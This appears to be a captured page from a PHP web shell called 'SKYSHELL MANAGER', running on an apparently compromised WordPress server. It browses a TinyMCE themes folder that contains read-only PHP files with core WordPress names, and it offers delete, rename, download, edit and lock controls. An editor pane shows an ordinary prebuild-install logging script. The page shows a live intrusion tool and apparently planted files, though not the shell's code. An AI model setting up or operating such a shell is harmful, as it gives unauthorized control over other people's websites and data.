📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: log.js
var log = require('npmlog') var fs = require('fs') var path = require('path') module.exports = function (rc, env) { log.heading = 'prebuild-install' if (rc.verbose) { log.level = 'verbose' } else { log.level = env.npm_config_loglevel || 'notice' } // Temporary workaround for npm 7 which swallows our output if (process.env.npm_config_prebuild_install_logfile) { var fp = path.resolve(process.env.npm_config_prebuild_install_logfile) log.on('log', function (msg) { // Only for tests, don't care about performance fs.appendFileSync(fp, [log.heading, msg.level, msg.prefix, msg.message].join(' ') + '\n') }) } return log }
Save